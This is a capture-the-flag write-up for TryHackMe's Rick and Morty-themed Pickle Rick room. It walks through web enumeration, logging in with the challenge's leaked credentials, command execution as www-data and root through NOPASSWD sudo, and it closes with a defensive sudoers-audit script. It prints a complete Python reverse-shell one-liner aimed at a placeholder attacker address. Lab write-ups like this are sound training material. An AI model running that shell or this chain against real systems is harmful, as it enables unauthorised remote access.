CTF Writeup: Pickle Rick

In this Rick and Morty-themed CTF from TryHackMe, the goal is to find three ingredients Rick needs to reverse his transformation into a pickle. The challenge involves classic web enumeration, command injection, and privilege escalation.

Reconnaissance

Nmap Scan:

nmap -sV -v <target-ip>

The scan showed open ports running OpenSSH 9.2p1 and Apache 2.4.41. Exploring the main web page, we discovered a username left in a comment in the HTML source:

Username: R1ckRul3s

Checking /robots.txt returned Rick's signature line, which at first did not seem useful. A gobuster scan revealed several accessible directories and PHP files, including a login form.

Requests to /assets, /denied.php, and /portal.php all redirected to the login page. Attempts at SQL injection and brute-force login failed.

Logging in with the enumerated username and the text from robots.txt as the password granted access through the login page:

Username: R1ckRul3s
Password: Wubbalubbadubdub

Successfully logging in gave access to a command execution panel as www-data.

Exploitation

Attempts to use netcat and generate a reverse shell initially failed. System enumeration through the command panel showed that execution of python3 was permitted, so a reverse shell was triggered with it instead:

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

With the shell active as www-data, the next step was privilege escalation.

Privilege Escalation

Running sudo -l revealed full root access without a password:

(ALL : ALL) NOPASSWD: ALL

Using sudo to access the /root directory revealed the final ingredient. Challenge complete.
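
From the defender's side, the sudo finding above is the kind of rule a sudoers audit should catch. The following is an added example, not part of the original challenge or writeup: it flags passwordless ALL grants and any sudo rule held by a service account. The sample sudoers text, the SERVICE_ACCOUNTS list and the audit_sudoers name are assumptions made for the example, and include directives and alias expansion are not followed.

```python
import re

# Accounts that run network-facing services (assumed list for this example).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# Shape of a sudoers user rule: who host = (runas) [TAG:] command, command ...
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\([^)]*\)\s*)?(?P<rest>.+)$"
)

# Constructed sample, not taken from the challenge host.
SAMPLE = """\
# constructed sudoers content for the example
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
www-data ALL=(ALL : ALL) NOPASSWD: ALL
"""


def audit_sudoers(text):
    """Return (line number, principal, reasons) for each risky rule."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments, include directives, Defaults and aliases.
        if (not line or line[0] in "#@" or line.startswith("Defaults")
                or "_Alias" in line.split()[0]):
            continue
        m = RULE.match(line)
        if not m:
            continue
        rest = m["rest"]
        tags = set(re.findall(r"\b([A-Z_]+):", rest))       # e.g. NOPASSWD
        cmds = [c.strip() for c in re.sub(r"\b[A-Z_]+:\s*", "", rest).split(",")]
        reasons = []
        if "NOPASSWD" in tags and "ALL" in cmds:
            reasons.append("passwordless sudo for every command")
        if m["who"].lstrip("%") in SERVICE_ACCOUNTS:
            reasons.append("service account holds sudo rights")
        if reasons:
            findings.append((lineno, m["who"], reasons))
    return findings


if __name__ == "__main__":
    for lineno, who, reasons in audit_sudoers(SAMPLE):
        print(f"line {lineno}: {who}: {'; '.join(reasons)}")
```
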
